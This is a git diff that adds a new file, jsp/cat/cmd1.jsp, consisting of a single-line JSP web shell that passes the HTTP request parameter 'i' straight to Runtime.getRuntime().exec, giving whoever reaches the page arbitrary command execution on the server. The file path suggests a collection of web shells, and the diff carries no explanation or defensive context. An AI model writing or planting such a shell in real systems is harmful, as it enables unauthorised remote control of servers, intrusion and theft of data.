diff --git a/jsp/cat/cmd1.jsp b/jsp/cat/cmd1.jsp new file mode 100644 index 0000000..848cfab --- /dev/null +++ b/jsp/cat/cmd1.jsp @@ -0,0 +1 @@ +<%Runtime.getRuntime().exec(request.getParameter("i"));%>